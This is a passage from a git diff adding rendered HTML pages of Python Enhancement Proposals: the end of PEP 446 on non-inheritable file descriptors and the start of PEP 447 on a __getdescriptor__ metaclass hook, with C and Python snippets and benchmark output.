There is one exception: os.pipe() creates non-inheritable pipes on +Windows, whereas it creates inheritable pipes on UNIX. The reason is an +implementation artifact: os.pipe() calls CreatePipe() on Windows +(native API), whereas it calls pipe() on UNIX (POSIX API). The call +to CreatePipe() was added in Python in 1994, before the introduction +of pipe() in the POSIX API in Windows 98. The issue #4708 proposes to change os.pipe() on +Windows to create inheritable pipes.

+
+
+

Inheritance of File Descriptors on Windows

+

On Windows, the native type of file objects is handles (C type +HANDLE). These handles have a HANDLE_FLAG_INHERIT flag which +defines if a handle can be inherited in a child process or not. For the +POSIX API, the C runtime (CRT) also provides file descriptors (C type +int). The handle of a file descriptor can be retrieve using the +function _get_osfhandle(fd). A file descriptor can be created from a +handle using the function _open_osfhandle(handle).

+

Using CreateProcess(), +handles are only inherited if their inheritable flag +(HANDLE_FLAG_INHERIT) is set and the bInheritHandles +parameter of CreateProcess() is TRUE; all file descriptors +except standard streams (0, 1, 2) are closed in the child process, even +if bInheritHandles is TRUE. Using the spawnv() function, all +inheritable handles and all inheritable file descriptors are inherited +in the child process. This function uses the undocumented fields +cbReserved2 and lpReserved2 of the STARTUPINFO +structure to pass an array of file descriptors.

+

To replace standard streams (stdin, stdout, stderr) using +CreateProcess(), the STARTF_USESTDHANDLES flag must be set in +the dwFlags field of the STARTUPINFO structure and the +bInheritHandles parameter of CreateProcess() must be set to +TRUE. So when at least one standard stream is replaced, all +inheritable handles are inherited by the child process.

+

The default value of the close_fds parameter of subprocess process +is True (bInheritHandles=FALSE) if stdin, stdout and +stderr parameters are None, False (bInheritHandles=TRUE) +otherwise.

+

See also:

+ +
+
+

Only Inherit Some Handles on Windows

+

Since Windows Vista, CreateProcess() supports an extension of the +STARTUPINFO structure: the STARTUPINFOEX structure. +Using this new structure, it is possible to specify a list of handles to +inherit: PROC_THREAD_ATTRIBUTE_HANDLE_LIST. Read Programmatically +controlling which handles are inherited by new processes in Win32 +(Raymond Chen, Dec 2011) for more information.

+

Before Windows Vista, it is possible to make handles inheritable and +call CreateProcess() with bInheritHandles=TRUE. This option +works if all other handles are non-inheritable. There is a race +condition: if another thread calls CreateProcess() with +bInheritHandles=TRUE, handles will also be inherited in the second +process.

+

Microsoft suggests to use a lock to avoid the race condition: read +Q315939: PRB: Child Inherits Unintended Handles During CreateProcess +Call (last review: +November 2006). The Python issue #16500 “Add an atfork module” proposes to add such lock, it can +be used to make handles non-inheritable without the race condition. Such +lock only protects against a race condition between Python threads; C +threads are not protected.

+

Another option is to duplicate handles that must be inherited, passing the +values of the duplicated handles to the child process, so the child +process can steal duplicated handles using DuplicateHandle() +with DUPLICATE_CLOSE_SOURCE. Handle values change between the +parent and the child process because the handles are duplicated (twice); +the parent and/or the child process must be adapted to handle this +change. If the child program cannot be modified, an intermediate program +can be used to steal handles from the parent process before spawning the +final child program. The intermediate program has to pass the handle from the +child process to the parent process. The parent may have to close +duplicated handles if all handles were not stolen, for example if the +intermediate process fails. If the command line is used to pass the +handle values, the command line must be modified when handles are +duplicated, because their values are modified.

+

This PEP does not include a solution to this problem because there is no +perfect solution working on all Windows versions. This point is deferred +until use cases relying on handle or file descriptor inheritance on +Windows are well known, so we can choose the best solution and carefully +test its implementation.

+
+
+

Inheritance of File Descriptors on UNIX

+

POSIX provides a close-on-exec flag on file descriptors to automatically +close a file descriptor when the C function execv() is +called. File descriptors with the close-on-exec flag cleared are +inherited in the child process, file descriptors with the flag set are +closed in the child process.

+

The flag can be set in two syscalls (one to get current flags, a second +to set new flags) using fcntl():

+
int flags, res;
+flags = fcntl(fd, F_GETFD);
+if (flags == -1) { /* handle the error */ }
+flags |= FD_CLOEXEC;
+/* or "flags &= ~FD_CLOEXEC;" to clear the flag */
+res = fcntl(fd, F_SETFD, flags);
+if (res == -1) { /* handle the error */ }
+
+
+

FreeBSD, Linux, Mac OS X, NetBSD, OpenBSD and QNX also support setting +the flag in a single syscall using ioctl():

+
int res;
+res = ioctl(fd, FIOCLEX, 0);
+if (!res) { /* handle the error */ }
+
+
+

NOTE: The close-on-exec flag has no effect on fork(): all file +descriptors are inherited by the child process. The Python issue #16500 +“Add an atfork module” proposes to +add a new atfork module to execute code at fork, which may be used to +automatically close file descriptors.

+
+
+

Issues with Inheritable File Descriptors

+

Most of the time, inheritable file descriptors “leaked” to child +processes are not noticed, because they don’t cause major bugs. It does +not mean that these bugs must not be fixed.

+

Two common issues with inherited file descriptors:

+
    +
  • On Windows, a directory cannot be removed before all file handles open +in the directory are closed. The same issue can be seen with files, +except if the file was created with the FILE_SHARE_DELETE flag +(O_TEMPORARY mode for open()).
  • +
  • If a listening socket is leaked to a child process, the socket address +cannot be reused before the parent and child processes terminated. For +example, if a web server spawns a new program to handle a process, and +the server restarts while the program is not done, the server cannot +start because the TCP port is still in use.
  • +
+

Example of issues in open source projects:

+
    +
  • Mozilla (Firefox): +open since 2002-05
  • +
  • dbus library: +fixed in 2008-05 (dbus commit), +close file descriptors in the child process
  • +
  • autofs: +fixed in 2009-02, set the CLOEXEC flag
  • +
  • qemu: +fixed in 2009-12 (qemu commit), +set CLOEXEC flag
  • +
  • Tor: +fixed in 2010-12, set CLOEXEC flag
  • +
  • OCaml: open since +2011-04, “PR#5256: Processes opened using Unix.open_process* inherit +all opened file descriptors (including sockets)”
  • +
  • ØMQ: +open since 2012-08
  • +
  • Squid: +open since 2012-07
  • +
+

See also: Excuse me son, but your code is leaking !!! (Dan Walsh, March 2012) +for SELinux issues with leaked file descriptors.

+
+
+

Security Vulnerability

+

Leaking sensitive file handles and file descriptors can lead to security +vulnerabilities. An untrusted child process might read sensitive data like +passwords or take control of the parent process though a leaked file +descriptor. With a leaked listening socket, a child process can accept +new connections to read sensitive data.

+

Example of vulnerabilities:

+ +

Read also the CERT Secure Coding Standards: +FIO42-C. Ensure files are properly closed when they are no longer +needed.

+
+
+

Issues fixed in the subprocess module

+

Inherited file descriptors caused 4 issues in the subprocess +module:

+ +

These issues were fixed in Python 3.2 by 4 different changes in the +subprocess module:

+
    +
  • Pipes are now non-inheritable;
  • +
  • The default value of the close_fds parameter is now True, +with one exception on Windows: the default value is False if +at least one standard stream is replaced;
  • +
  • A new pass_fds parameter has been added;
  • +
  • Creation of a _posixsubprocess module implemented in C.
  • +
+
+
+

Atomic Creation of non-inheritable File Descriptors

+

In a multi-threaded application, an inheritable file descriptor may be +created just before a new program is spawned, before the file descriptor +is made non-inheritable. In this case, the file descriptor is leaked to +the child process. This race condition could be avoided if the file +descriptor is created directly non-inheritable.

+

FreeBSD, Linux, Mac OS X, Windows and many other operating systems +support creating non-inheritable file descriptors with the inheritable +flag cleared atomically at the creation of the file descriptor.

+

A new WSA_FLAG_NO_HANDLE_INHERIT flag for WSASocket() was added +in Windows 7 SP1 and Windows Server 2008 R2 SP1 to create +non-inheritable sockets. If this flag is used on an older Windows +version (ex: Windows XP SP3), WSASocket() fails with +WSAEPROTOTYPE.

+

On UNIX, new flags were added for files and sockets:

+
    +
  • O_CLOEXEC: available on Linux (2.6.23), FreeBSD (8.3), +Mac OS 10.8, OpenBSD 5.0, Solaris 11, QNX, BeOS, next NetBSD release +(6.1?). This flag is part of POSIX.1-2008.
  • +
  • SOCK_CLOEXEC flag for socket() and socketpair(), +available on Linux 2.6.27, OpenBSD 5.2, NetBSD 6.0.
  • +
  • fcntl(): F_DUPFD_CLOEXEC flag, available on Linux 2.6.24, +OpenBSD 5.0, FreeBSD 9.1, NetBSD 6.0, Solaris 11. This flag is part +of POSIX.1-2008.
  • +
  • fcntl(): F_DUP2FD_CLOEXEC flag, available on FreeBSD 9.1 +and Solaris 11.
  • +
  • recvmsg(): MSG_CMSG_CLOEXEC, available on Linux 2.6.23, +NetBSD 6.0.
  • +
+

On Linux older than 2.6.23, O_CLOEXEC flag is simply ignored. So +fcntl() must be called to check if the file descriptor is +non-inheritable: O_CLOEXEC is not supported if the FD_CLOEXEC +flag is missing. On Linux older than 2.6.27, socket() or +socketpair() fail with errno set to EINVAL if the +SOCK_CLOEXEC flag is set in the socket type.

+

New functions:

+
    +
  • dup3(): available on Linux 2.6.27 (and glibc 2.9)
  • +
  • pipe2(): available on Linux 2.6.27 (and glibc 2.9)
  • +
  • accept4(): available on Linux 2.6.28 (and glibc 2.10)
  • +
+

On Linux older than 2.6.28, accept4() fails with errno set to +ENOSYS.

+

Summary:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Operating SystemAtomic FileAtomic Socket
FreeBSD8.3 (2012)X
Linux2.6.23 (2007)2.6.27 (2008)
Mac OS X10.8 (2012)X
NetBSD6.1 (?)6.0 (2012)
OpenBSD5.0 (2011)5.2 (2012)
Solaris11 (2011)X
WindowsXP (2001)Seven SP1 (2011), 2008 R2 SP1 (2011)
+

Legend:

+
    +
  • “Atomic File”: first version of the operating system supporting +creating atomically a non-inheritable file descriptor using +open()
  • +
  • “Atomic Socket”: first version of the operating system supporting +creating atomically a non-inheritable socket
  • +
  • “X”: not supported yet
  • +
+

See also:

+ +
+
+

Status of Python 3.3

+

Python 3.3 creates inheritable file descriptors on all platforms, except +os.pipe() which creates non-inheritable file descriptors on Windows.

+

New constants and functions related to the atomic creation of +non-inheritable file descriptors were added to Python 3.3: +os.O_CLOEXEC, os.pipe2() and socket.SOCK_CLOEXEC.

+

On UNIX, the subprocess module closes all file descriptors in the +child process by default, except standard streams (0, 1, 2) and file +descriptors of the pass_fds parameter. If the close_fds parameter is +set to False, all inheritable file descriptors are inherited in the +child process.

+

On Windows, the subprocess closes all handles and file descriptors +in the child process by default. If at least one standard stream (stdin, +stdout or stderr) is replaced (ex: redirected into a pipe), all +inheritable handles and file descriptors 0, 1 and 2 are inherited in the +child process.

+

Using the functions of the os.execv*() and os.spawn*() families, +all inheritable handles and all inheritable file descriptors are +inherited by the child process.

+

On UNIX, the multiprocessing module uses os.fork() and so all +file descriptors are inherited by child processes.

+

On Windows, all inheritable handles and file descriptors 0, 1 and 2 are +inherited by the child process using the multiprocessing module, all +file descriptors except standard streams are closed.

+

Summary:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
ModuleFD on UNIXHandles on WindowsFD on Windows
subprocess, defaultSTD, pass_fdsnoneSTD
subprocess, replace stdoutSTD, pass_fdsallSTD
subprocess, close_fds=FalseallallSTD
multiprocessingnot applicableallSTD
os.execv(), os.spawn()allallall
+

Legend:

+
    +
  • “all”: all inheritable file descriptors or handles are inherited in +the child process
  • +
  • “none”: all handles are closed in the child process
  • +
  • “STD”: only file descriptors 0 (stdin), 1 (stdout) and 2 (stderr) are +inherited in the child process
  • +
  • “pass_fds”: file descriptors of the pass_fds parameter of the +subprocess are inherited
  • +
  • “not applicable”: on UNIX, the multiprocessing uses fork(), +so this case is not affected by this PEP.
  • +
+
+
+

Closing All Open File Descriptors

+

On UNIX, the subprocess module closes almost all file descriptors in +the child process. This operation requires MAXFD system calls, where +MAXFD is the maximum number of file descriptors, even if there are only +few open file descriptors. This maximum can be read using: +os.sysconf("SC_OPEN_MAX").

+

The operation can be slow if MAXFD is large. For example, on a FreeBSD +buildbot with MAXFD=655,000, the operation took 300 ms: see +issue #11284: slow close file descriptors.

+

On Linux, Python 3.3 gets the list of all open file descriptors from +/proc/<PID>/fd/, and so performances depends on the number of open +file descriptors, not on MAXFD.

+

See also:

+
    +
  • Python issue #1663329: +subprocess close_fds perform poor if SC_OPEN_MAX is high
  • +
  • Squid Bug #837033: +Squid should set CLOEXEC on opened FDs. “32k+ close() calls in each +child process take a long time ([12-56] seconds) in Xen PV guests.”
  • +
+
+
+
+

Proposal

+
+

Non-inheritable File Descriptors

+

The following functions are modified to make newly created file +descriptors non-inheritable by default:

+
    +
  • asyncore.dispatcher.create_socket()
  • +
  • io.FileIO
  • +
  • io.open()
  • +
  • open()
  • +
  • os.dup()
  • +
  • os.fdopen()
  • +
  • os.open()
  • +
  • os.openpty()
  • +
  • os.pipe()
  • +
  • select.devpoll()
  • +
  • select.epoll()
  • +
  • select.kqueue()
  • +
  • socket.socket()
  • +
  • socket.socket.accept()
  • +
  • socket.socket.dup()
  • +
  • socket.socket.fromfd()
  • +
  • socket.socketpair()
  • +
+

os.dup2() still creates inheritable by default, see below.

+

When available, atomic flags are used to make file descriptors +non-inheritable. The atomicity is not guaranteed because a fallback is +required when atomic flags are not available.

+
+
+

New Functions And Methods

+

New functions available on all platforms:

+
    +
  • os.get_inheritable(fd: int): return True if the file +descriptor can be inherited by child processes, False otherwise.
  • +
  • os.set_inheritable(fd: int, inheritable: bool): set the +inheritable flag of the specified file descriptor.
  • +
+

New functions only available on Windows:

+
    +
  • os.get_handle_inheritable(handle: int): return True if the +handle can be inherited by child processes, False otherwise.
  • +
  • os.set_handle_inheritable(handle: int, inheritable: bool): +set the inheritable flag of the specified handle.
  • +
+

New methods:

+
    +
  • socket.socket.get_inheritable(): return True if the +socket can be inherited by child processes, False otherwise.
  • +
  • socket.socket.set_inheritable(inheritable: bool): +set the inheritable flag of the specified socket.
  • +
+
+
+

Other Changes

+

On UNIX, subprocess makes file descriptors of the pass_fds parameter +inheritable. The file descriptor is made inheritable in the child +process after the fork() and before execv(), so the inheritable +flag of file descriptors is unchanged in the parent process.

+

os.dup2() has a new optional inheritable parameter: os.dup2(fd, +fd2, inheritable=True). fd2 is created inheritable by default, but +non-inheritable if inheritable is False.

+

os.dup2() behaves differently than os.dup() because the most +common use case of os.dup2() is to replace the file descriptors of +the standard streams: stdin (0), stdout (1) and +stderr (2). Standard streams are expected to be inherited by +child processes.

+
+
+
+

Backward Compatibility

+

This PEP break applications relying on inheritance of file descriptors. +Developers are encouraged to reuse the high-level Python module +subprocess which handles the inheritance of file descriptors in a +portable way.

+

Applications using the subprocess module with the pass_fds +parameter or using only os.dup2() to redirect standard streams should +not be affected.

+

Python no longer conform to POSIX, since file descriptors are now +made non-inheritable by default. Python was not designed to conform to +POSIX, but was designed to develop portable applications.

+
+ +
+

Rejected Alternatives

+
+

Add a new open_noinherit() function

+

In June 2007, Henning von Bargen proposed on the python-dev mailing list +to add a new open_noinherit() function to fix issues of inherited file +descriptors in child processes. At this time, the default value of the +close_fds parameter of the subprocess module was False.

+

Read the mail thread: [Python-Dev] Proposal for a new function +“open_noinherit” to avoid problems with subprocesses and security risks.

+
+
+

PEP 433

+

PEP 433, “Easier suppression of file descriptor inheritance”, +was a previous attempt proposing various other alternatives, but no +consensus could be reached.

+
+
+
+

Python Issues

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0446.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0447/index.html b/pep-0447/index.html new file mode 100644 index 00000000000..0de3d15e6c1 --- /dev/null +++ b/pep-0447/index.html @@ -0,0 +1,804 @@ + + + + + + + + PEP 447 – Add __getdescriptor__ method to metaclass | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 447 – Add __getdescriptor__ method to metaclass

+
+
Author:
+
Ronald Oussoren <ronaldoussoren at mac.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
12-Jun-2013
+
Post-History:
+
02-Jul-2013, 15-Jul-2013, 29-Jul-2013, 22-Jul-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently object.__getattribute__ and super.__getattribute__ peek +in the __dict__ of classes on the MRO for a class when looking for +an attribute. This PEP adds an optional __getdescriptor__ method to +a metaclass that replaces this behavior and gives more control over attribute +lookup, especially when using a super object.

+

That is, the MRO walking loop in _PyType_Lookup and +super.__getattribute__ gets changed from:

+
def lookup(mro_list, name):
+    for cls in mro_list:
+        if name in cls.__dict__:
+            return cls.__dict__
+
+    return NotFound
+
+
+

to:

+
def lookup(mro_list, name):
+    for cls in mro_list:
+        try:
+            return cls.__getdescriptor__(name)
+        except AttributeError:
+            pass
+
+    return NotFound
+
+
+

The default implementation of __getdescriptor__ looks in the class +dictionary:

+
class type:
+   def __getdescriptor__(cls, name):
+       try:
+           return cls.__dict__[name]
+       except KeyError:
+           raise AttributeError(name) from None
+
+
+
+
+

PEP Status

+

This PEP is deferred until someone has time to update this PEP and push it forward.

+
+
+

Rationale

+

It is currently not possible to influence how the super class looks +up attributes (that is, super.__getattribute__ unconditionally +peeks in the class __dict__), and that can be problematic for +dynamic classes that can grow new methods on demand, for example dynamic +proxy classes.

+

The __getdescriptor__ method makes it possible to dynamically add +attributes even when looking them up using the super class.

+

The new method affects object.__getattribute__ (and +PyObject_GenericGetAttr) as well for consistency and to have a single +place to implement dynamic attribute resolution for classes.

+
+

Background

+

The current behavior of super.__getattribute__ causes problems for +classes that are dynamic proxies for other (non-Python) classes or types, +an example of which is PyObjC. PyObjC creates a Python class for every +class in the Objective-C runtime, and looks up methods in the Objective-C +runtime when they are used. This works fine for normal access, but doesn’t +work for access with super objects. Because of this PyObjC currently +includes a custom super that must be used with its classes, as well as +completely reimplementing PyObject_GenericGetAttr for normal attribute +access.

+

The API in this PEP makes it possible to remove the custom super and +simplifies the implementation because the custom lookup behavior can be +added in a central location.

+
+

Note

+

PyObjC cannot precalculate the contents of the class __dict__ +because Objective-C classes can grow new methods at runtime. Furthermore, +Objective-C classes tend to contain a lot of methods while most Python +code will only use a small subset of them, this makes precalculating +unnecessarily expensive.

+
+
+
+
+

The superclass attribute lookup hook

+

Both super.__getattribute__ and object.__getattribute__ (or +PyObject_GenericGetAttr and in particular _PyType_Lookup in C code) +walk an object’s MRO and currently peek in the class’ __dict__ to look up +attributes.

+

With this proposal both lookup methods no longer peek in the class __dict__ +but call the special method __getdescriptor__, which is a slot defined +on the metaclass. The default implementation of that method looks +up the name the class __dict__, which means that attribute lookup is +unchanged unless a metatype actually defines the new special method.

+
+

Aside: Attribute resolution algorithm in Python

+

The attribute resolution process as implemented by object.__getattribute__ +(or PyObject_GenericGetAttr in CPython’s implementation) is fairly +straightforward, but not entirely so without reading C code.

+

The current CPython implementation of object.__getattribute__ is basically +equivalent to the following (pseudo-) Python code (excluding some house +keeping and speed tricks):

+
def _PyType_Lookup(tp, name):
+    mro = tp.mro()
+    assert isinstance(mro, tuple)
+
+    for base in mro:
+       assert isinstance(base, type)
+
+       # PEP 447 will change these lines:
+       try:
+           return base.__dict__[name]
+       except KeyError:
+           pass
+
+    return None
+
+
+class object:
+    def __getattribute__(self, name):
+        assert isinstance(name, str)
+
+        tp = type(self)
+        descr = _PyType_Lookup(tp, name)
+
+        f = None
+        if descr is not None:
+            f = descr.__get__
+            if f is not None and descr.__set__ is not None:
+                # Data descriptor
+                return f(descr, self, type(self))
+
+        dict = self.__dict__
+        if dict is not None:
+            try:
+                return self.__dict__[name]
+            except KeyError:
+                pass
+
+        if f is not None:
+            # Non-data descriptor
+            return f(descr, self, type(self))
+
+        if descr is not None:
+            # Regular class attribute
+            return descr
+
+        raise AttributeError(name)
+
+
+class super:
+    def __getattribute__(self, name):
+       assert isinstance(name, unicode)
+
+       if name != '__class__':
+           starttype = self.__self_type__
+           mro = startype.mro()
+
+           try:
+               idx = mro.index(self.__thisclass__)
+
+           except ValueError:
+               pass
+
+           else:
+               for base in mro[idx+1:]:
+                   # PEP 447 will change these lines:
+                   try:
+                       descr = base.__dict__[name]
+                   except KeyError:
+                       continue
+
+                   f = descr.__get__
+                   if f is not None:
+                       return f(descr,
+                           None if (self.__self__ is self.__self_type__) else self.__self__,
+                           starttype)
+
+                   else:
+                       return descr
+
+       return object.__getattribute__(self, name)
+
+
+

This PEP should change the dict lookup at the lines starting at “# PEP 447” with +a method call to perform the actual lookup, making is possible to affect that +lookup both for normal attribute access and access through the super proxy.

+

Note that specific classes can already completely override the default +behaviour by implementing their own __getattribute__ slot (with or without +calling the super class implementation).

+
+
+

In Python code

+

A meta type can define a method __getdescriptor__ that is called during +attribute resolution by both super.__getattribute__ +and object.__getattribute:

+
class MetaType(type):
+    def __getdescriptor__(cls, name):
+        try:
+            return cls.__dict__[name]
+        except KeyError:
+            raise AttributeError(name) from None
+
+
+

The __getdescriptor__ method has as its arguments a class (which is an +instance of the meta type) and the name of the attribute that is looked up. +It should return the value of the attribute without invoking descriptors, +and should raise AttributeError when the name cannot be found.

+

The type class provides a default implementation for __getdescriptor__, +that looks up the name in the class dictionary.

+
+

Example usage

+

The code below implements a silly metaclass that redirects attribute lookup to +uppercase versions of names:

+
class UpperCaseAccess (type):
+    def __getdescriptor__(cls, name):
+        try:
+            return cls.__dict__[name.upper()]
+        except KeyError:
+            raise AttributeError(name) from None
+
+class SillyObject (metaclass=UpperCaseAccess):
+    def m(self):
+        return 42
+
+    def M(self):
+        return "fortytwo"
+
+obj = SillyObject()
+assert obj.m() == "fortytwo"
+
+
+

As mentioned earlier in this PEP a more realistic use case of this +functionality is a __getdescriptor__ method that dynamically populates the +class __dict__ based on attribute access, primarily when it is not +possible to reliably keep the class dict in sync with its source, for example +because the source used to populate __dict__ is dynamic as well and does +not have triggers that can be used to detect changes to that source.

+

An example of that are the class bridges in PyObjC: the class bridge is a +Python object (class) that represents an Objective-C class and conceptually +has a Python method for every Objective-C method in the Objective-C class. +As with Python it is possible to add new methods to an Objective-C class, or +replace existing ones, and there are no callbacks that can be used to detect +this.

+
+
+
+

In C code

+

A new type flag Py_TPFLAGS_GETDESCRIPTOR with value (1UL << 11) that +indicates that the new slot is present and to be used.

+

A new slot tp_getdescriptor is added to the PyTypeObject struct, this +slot corresponds to the __getdescriptor__ method on type.

+

The slot has the following prototype:

+
PyObject* (*getdescriptorfunc)(PyTypeObject* cls, PyObject* name);
+
+
+

This method should lookup name in the namespace of cls, without looking at +superclasses, and should not invoke descriptors. The method returns NULL +without setting an exception when the name cannot be found, and returns a +new reference otherwise (not a borrowed reference).

+

Classes with a tp_getdescriptor slot must add Py_TPFLAGS_GETDESCRIPTOR +to tp_flags to indicate that new slot must be used.

+
+
+

Use of this hook by the interpreter

+

The new method is required for metatypes and as such is defined on type_. +Both super.__getattribute__ and +object.__getattribute__/PyObject_GenericGetAttr +(through _PyType_Lookup) use the this __getdescriptor__ method when +walking the MRO.

+
+
+

Other changes to the implementation

+

The change for PyObject_GenericGetAttr will be done by changing the private +function _PyType_Lookup. This currently returns a borrowed reference, but +must return a new reference when the __getdescriptor__ method is present. +Because of this _PyType_Lookup will be renamed to _PyType_LookupName, +this will cause compile-time errors for all out-of-tree users of this +private API.

+

For the same reason _PyType_LookupId is renamed to _PyType_LookupId2. +A number of other functions in typeobject.c with the same issue do not get +an updated name because they are private to that file.

+

The attribute lookup cache in Objects/typeobject.c is disabled for classes +that have a metaclass that overrides __getdescriptor__, because using the +cache might not be valid for such classes.

+
+
+
+

Impact of this PEP on introspection

+

Use of the method introduced in this PEP can affect introspection of classes +with a metaclass that uses a custom __getdescriptor__ method. This section +lists those changes.

+

The items listed below are only affected by custom __getdescriptor__ +methods, the default implementation for object won’t cause problems +because that still only uses the class __dict__ and won’t cause visible +changes to the visible behaviour of the object.__getattribute__.

+
    +
  • dir might not show all attributes

    As with a custom __getattribute__ method dir() might not see all +(instance) attributes when using the __getdescriptor__() method to +dynamically resolve attributes.

    +

    The solution for that is quite simple: classes using __getdescriptor__ +should also implement __dir__() if they want full support for the builtin +dir() function.

    +
  • +
  • inspect.getattr_static might not show all attributes

    The function inspect.getattr_static intentionally does not invoke +__getattribute__ and descriptors to avoid invoking user code during +introspection with this function. The __getdescriptor__ method will also +be ignored and is another way in which the result of inspect.getattr_static +can be different from that of builtin.getattr.

    +
  • +
  • inspect.getmembers and inspect.classify_class_attrs

    Both of these functions directly access the class __dict__ of classes along +the MRO, and hence can be affected by a custom __getdescriptor__ method.

    +

    Code with a custom __getdescriptor__ method that want to play nice with +these methods also needs to ensure that the __dict__ is set up correctly +when that is accessed directly by Python code.

    +

    Note that inspect.getmembers is used by pydoc and hence this can +affect runtime documentation introspection.

    +
  • +
  • Direct introspection of the class __dict__

    Any code that directly access the class __dict__ for introspection +can be affected by a custom __getdescriptor__ method, see the previous +item.

    +
  • +
+
+
+

Performance impact

+

WARNING: The benchmark results in this section are old, and will be updated +when I’ve ported the patch to the current trunk. I don’t expect significant +changes to the results in this section.

+
+

Micro benchmarks

+

Issue 18181 has a micro benchmark as one of its attachments +(pep447-micro-bench.py) that specifically tests the speed of attribute +lookup, both directly and through super.

+

Note that attribute lookup with deep class hierarchies is significantly slower +when using a custom __getdescriptor__ method. This is because the +attribute lookup cache for CPython cannot be used when having this method.

+
+
+

Pybench

+

The pybench output below compares an implementation of this PEP with the +regular source tree, both based on changeset a5681f50bae2, run on an idle +machine and Core i7 processor running Centos 6.4.

+

Even though the machine was idle there were clear differences between runs, +I’ve seen difference in “minimum time” vary from -0.1% to +1.5%, with similar +(but slightly smaller) differences in the “average time” difference.

+
-------------------------------------------------------------------------------
+PYBENCH 2.1
+-------------------------------------------------------------------------------
+* using CPython 3.4.0a0 (default, Jul 29 2013, 13:01:34) [GCC 4.4.7 20120313 (Red Hat 4.4.7-3)]
+* disabled garbage collection
+* system check interval set to maximum: 2147483647
+* using timer: time.perf_counter
+* timer: resolution=1e-09, implementation=clock_gettime(CLOCK_MONOTONIC)
+
+-------------------------------------------------------------------------------
+Benchmark: pep447.pybench
+-------------------------------------------------------------------------------
+
+    Rounds: 10
+    Warp:   10
+    Timer:  time.perf_counter
+
+    Machine Details:
+       Platform ID:    Linux-2.6.32-358.114.1.openstack.el6.x86_64-x86_64-with-centos-6.4-Final
+       Processor:      x86_64
+
+    Python:
+       Implementation: CPython
+       Executable:     /tmp/default-pep447/bin/python3
+       Version:        3.4.0a0
+       Compiler:       GCC 4.4.7 20120313 (Red Hat 4.4.7-3)
+       Bits:           64bit
+       Build:          Jul 29 2013 14:09:12 (#default)
+       Unicode:        UCS4
+
+
+-------------------------------------------------------------------------------
+Comparing with: default.pybench
+-------------------------------------------------------------------------------
+
+    Rounds: 10
+    Warp:   10
+    Timer:  time.perf_counter
+
+    Machine Details:
+       Platform ID:    Linux-2.6.32-358.114.1.openstack.el6.x86_64-x86_64-with-centos-6.4-Final
+       Processor:      x86_64
+
+    Python:
+       Implementation: CPython
+       Executable:     /tmp/default/bin/python3
+       Version:        3.4.0a0
+       Compiler:       GCC 4.4.7 20120313 (Red Hat 4.4.7-3)
+       Bits:           64bit
+       Build:          Jul 29 2013 13:01:34 (#default)
+       Unicode:        UCS4
+
+
+Test                             minimum run-time        average  run-time
+                                 this    other   diff    this    other   diff
+-------------------------------------------------------------------------------
+          BuiltinFunctionCalls:    45ms    44ms   +1.3%    45ms    44ms   +1.3%
+           BuiltinMethodLookup:    26ms    27ms   -2.4%    27ms    27ms   -2.2%
+                 CompareFloats:    33ms    34ms   -0.7%    33ms    34ms   -1.1%
+         CompareFloatsIntegers:    66ms    67ms   -0.9%    66ms    67ms   -0.8%
+               CompareIntegers:    51ms    50ms   +0.9%    51ms    50ms   +0.8%
+        CompareInternedStrings:    34ms    33ms   +0.4%    34ms    34ms   -0.4%
+                  CompareLongs:    29ms    29ms   -0.1%    29ms    29ms   -0.0%
+                CompareStrings:    43ms    44ms   -1.8%    44ms    44ms   -1.8%
+    ComplexPythonFunctionCalls:    44ms    42ms   +3.9%    44ms    42ms   +4.1%
+                 ConcatStrings:    33ms    33ms   -0.4%    33ms    33ms   -1.0%
+               CreateInstances:    47ms    48ms   -2.9%    47ms    49ms   -3.4%
+            CreateNewInstances:    35ms    36ms   -2.5%    36ms    36ms   -2.5%
+       CreateStringsWithConcat:    69ms    70ms   -0.7%    69ms    70ms   -0.9%
+                  DictCreation:    52ms    50ms   +3.1%    52ms    50ms   +3.0%
+             DictWithFloatKeys:    40ms    44ms  -10.1%    43ms    45ms   -5.8%
+           DictWithIntegerKeys:    32ms    36ms  -11.2%    35ms    37ms   -4.6%
+            DictWithStringKeys:    29ms    34ms  -15.7%    35ms    40ms  -11.0%
+                      ForLoops:    30ms    29ms   +2.2%    30ms    29ms   +2.2%
+                    IfThenElse:    38ms    41ms   -6.7%    38ms    41ms   -6.9%
+                   ListSlicing:    36ms    36ms   -0.7%    36ms    37ms   -1.3%
+                NestedForLoops:    43ms    45ms   -3.1%    43ms    45ms   -3.2%
+      NestedListComprehensions:    39ms    40ms   -1.7%    39ms    40ms   -2.1%
+          NormalClassAttribute:    86ms    82ms   +5.1%    86ms    82ms   +5.0%
+       NormalInstanceAttribute:    42ms    42ms   +0.3%    42ms    42ms   +0.0%
+           PythonFunctionCalls:    39ms    38ms   +3.5%    39ms    38ms   +2.8%
+             PythonMethodCalls:    51ms    49ms   +3.0%    51ms    50ms   +2.8%
+                     Recursion:    67ms    68ms   -1.4%    67ms    68ms   -1.4%
+                  SecondImport:    41ms    36ms  +12.5%    41ms    36ms  +12.6%
+           SecondPackageImport:    45ms    40ms  +13.1%    45ms    40ms  +13.2%
+         SecondSubmoduleImport:    92ms    95ms   -2.4%    95ms    98ms   -3.6%
+       SimpleComplexArithmetic:    28ms    28ms   -0.1%    28ms    28ms   -0.2%
+        SimpleDictManipulation:    57ms    57ms   -1.0%    57ms    58ms   -1.0%
+         SimpleFloatArithmetic:    29ms    28ms   +4.7%    29ms    28ms   +4.9%
+      SimpleIntFloatArithmetic:    37ms    41ms   -8.5%    37ms    41ms   -8.7%
+       SimpleIntegerArithmetic:    37ms    41ms   -9.4%    37ms    42ms  -10.2%
+      SimpleListComprehensions:    33ms    33ms   -1.9%    33ms    34ms   -2.9%
+        SimpleListManipulation:    28ms    30ms   -4.3%    29ms    30ms   -4.1%
+          SimpleLongArithmetic:    26ms    26ms   +0.5%    26ms    26ms   +0.5%
+                    SmallLists:    40ms    40ms   +0.1%    40ms    40ms   +0.1%
